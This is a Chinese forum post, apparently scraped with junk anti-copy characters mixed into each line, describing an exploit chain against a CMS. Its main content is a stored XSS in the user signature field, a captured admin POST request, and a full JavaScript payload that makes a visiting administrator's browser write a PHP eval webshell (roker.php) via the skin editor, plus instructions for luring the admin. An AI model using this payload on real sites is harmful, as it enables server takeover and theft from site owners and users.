|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
: h8 S! `7 O0 G B. l& B! P, W: j官网已经修补了,所以重新下了源码
5 o. p+ i# d$ m7 b1 i因为 后台登入 还需要认证码 所以 注入就没看了。
3 N0 X0 l, C' G. D' [8 \2 M; D存在 xss
' c: S K3 H' Y- j5 s" a漏洞文件 user/member/skin_edit.php
: n: V' F+ P: }! i本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:7 g/ I+ K/ Y z& N% R
+ {& {4 \% p/ t</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
" T1 R% J7 S, a$ w! \; i# @
, C$ {% d1 r- Q ~) v$ a* D2 _" r- S</textarea></td></tr>5 I& l! f) R9 s" B4 w/ r- B5 s
/ V# I1 n: b3 H" [5 y user/do.php $ B! l# E3 m6 o% y! k* ^
. ]- ~( R9 h3 g- p; U; n
6 c5 J: w3 q8 p$ S, a9 [& R" z; Fif($op=='zl'){ //资料
+ Z6 |9 Z% Z( l1 X! m5 L/ g . ^* {3 q+ b# J) M% k( ^
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
0 S) o1 i S; A/ I. {) m5 I exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
" q% ]& p- C! {7 d- D( u! ^# U / [( C( _! C+ Q1 L5 S2 S
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
/ W! N& j( O/ U$ ]' c7 e2 F3 @
/ j) A& B! E5 G! Q4 f: f C# B) l" ]! U% r CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
% ^" x- j9 C* t4 r4 L( ^5 U$ v where CS_Name='".$cscms_name."'";
% X9 ?+ h! k5 J4 K + f3 C) v7 C5 I5 ?0 K
if($db->query($sql)){
! c5 s) {* z% q' X% e- H# ] 0 E9 ^1 f, h& e0 m4 z
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
1 ]$ @6 o5 z. ~. C
$ h' K* i: }1 m& R }else{9 F9 c+ d! u# `
/ A+ S. X9 w% D# F/ b" Z
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));$ j( W0 u2 a2 y, l9 T. K& ^0 T4 }7 f
$ R6 v I% k6 `1 X# ` }3 r5 n! g V4 C. {0 b4 x$ {; E
$ {& A. Z& T: g
6 {- f( i ^5 y0 M1 y没有 过滤导致xss产生。$ R! p1 E) Q4 j
后台 看了下 很奇葩的是可以写任意格式文件。。
+ M% b7 r$ I1 [1 J1 ^5 a抓包。。/ ~- q# }/ u3 w6 R1 Z' K9 G
4 j. z; y' A5 D" l( R9 o7 W& D; {1 @
/ t* y) F7 S! J2 D: a7 H本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.12 t" v+ f% T8 v
, V) N9 D. A( a9 W {
Accept: text/html, application/xhtml+xml, */*. p( N& V, j2 G) M! o
; e3 p3 v% W6 e. q7 RReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php8 p! E2 h% V2 A# n" l9 K# w
4 j/ E4 Y5 @: y" b* JAccept-Language: zh-CN8 G' e x" K3 _8 r) \) \, ^
$ Y' N) C2 }, h1 {$ ?4 h- |) ?User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
/ ~7 Q- j ]3 m3 F8 z9 E1 V + y x' o1 K" X4 a7 X/ }$ F+ m
Content-Type: application/x-www-form-urlencoded+ ?3 c1 W7 ~2 j" D3 b7 U
9 O5 t; V+ x: d7 _1 TAccept-Encoding: gzip, deflate9 u; s% z6 z8 t) k* t2 `! G1 a5 `
0 g; O1 n4 l/ T V7 ~0 G$ y
Host: 127.0.0.1
# ~" d/ B: r1 y) A* J r$ t; [3 g t : Y4 |1 f/ U1 G8 @, Z; ^
Content-Length: 38, n; L0 h( \. _7 J# N8 W& E; g
( [) I9 ?2 O7 w( P3 yDNT: 1' l( v) z1 g: O0 z
8 ^2 v' b- S5 f& `2 U% yConnection: Keep-Alive
0 v7 S5 J+ \/ p* p4 H$ @: N % w6 S4 y5 b% q z* s: y% j
Cache-Control: no-cache
3 X4 Z" g& Y: z9 D6 | Q; Z* B & K- q3 B8 K5 |8 U6 m e5 v! t) [
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
4 |" L& \) U# u/ G d
1 N0 J2 \% X6 w; J6 L* R
% t& j$ N! c4 ^$ V5 Z* Pname=aaa.php&content=%3Cs%3E%3Ca%25%3E/ K$ B9 W$ o ~( U2 j) c" D
$ Q* t2 r5 f% c
/ S5 |! A' @3 ~) U8 p# T
0 G1 s1 Z3 K) P& O/ i. g6 e
于是 构造js如下。
g+ C0 e* g$ B2 N& O& |! u; b2 V* P7 q; T
本帖隐藏的内容<script>
7 v# z$ |& z! M p/ a' h5 PthisTHost = top.location.hostname;9 `* y6 O, l* A. W/ f- | g
1 v% T* A0 R: V. Z+ ZthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
, L, g+ f+ ^$ b; ?, P - N# |, Z( |8 o6 K
function PostSubmit(url, data, msg) {
3 h; f7 h6 J: i var postUrl = url;7 Y1 l9 I. _: k) b
' v1 Q& H( q$ ?& s$ ]! B" Y* n" }9 q
var postData = data;
# F6 n: f5 N; [4 m( r8 w var msgData = msg; 7 p& g; n2 V7 q$ n
var ExportForm = document.createElement("FORM"); ' x ^9 ?9 p* T: ]3 Q, m, F
document.body.appendChild(ExportForm); 4 F) j, c/ q8 E9 s5 |- X1 ~+ L0 Q' ^! y
ExportForm.method = "POST";
: Q: W9 }+ H- _1 D var newElement = document.createElement("input");
. k5 i9 n7 a5 E* ?0 S newElement.setAttribute("name", "name"); ' l$ `. l/ l- K; }! h5 \+ i
newElement.setAttribute("type", "hidden");
7 Q, c+ U% K+ X; `( n0 H0 V var newElement2 = document.createElement("input");
6 Z5 \/ z8 o$ ^1 K1 h: F7 H d M newElement2.setAttribute("name", "content"); * U( @* h; l8 p' J
newElement2.setAttribute("type", "hidden");
) I5 W7 } t b: C* f: M8 H. }* V ExportForm.appendChild(newElement);
m4 j% P+ E. z( w/ ? ` ExportForm.appendChild(newElement2); / l' h( y8 y* Q+ z6 N* ?* u0 ^
newElement.value = postData;
9 L& B% `# v5 f& Y newElement2.value = msgData; . T8 X2 H+ g9 v5 O r
ExportForm.action = postUrl;
U0 G% s5 W* y4 Q4 I ExportForm.submit(); 0 |7 f5 ?1 b: ^) v
};
. D) g6 i7 _# D , X5 R' Z$ H! d$ {
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");+ u7 M' |% c; r$ d- S
4 @# i, R, p, i# @: S
</script>
, O: W$ Y2 z. ^$ H: D/ J6 B1 Y1 U! p" }4 {" z
6 g, U- f- A8 U7 T& m5 b, z8 y; G2 U: e8 b
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
: q$ X4 p6 l6 j. ]" _& k用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改): F. Q" G! r' U$ w9 Q8 B
就会 在 skins\index\html\目录下生成 roker.php 一句话。 | 1 m) v# x0 z( u* S2 T
|
|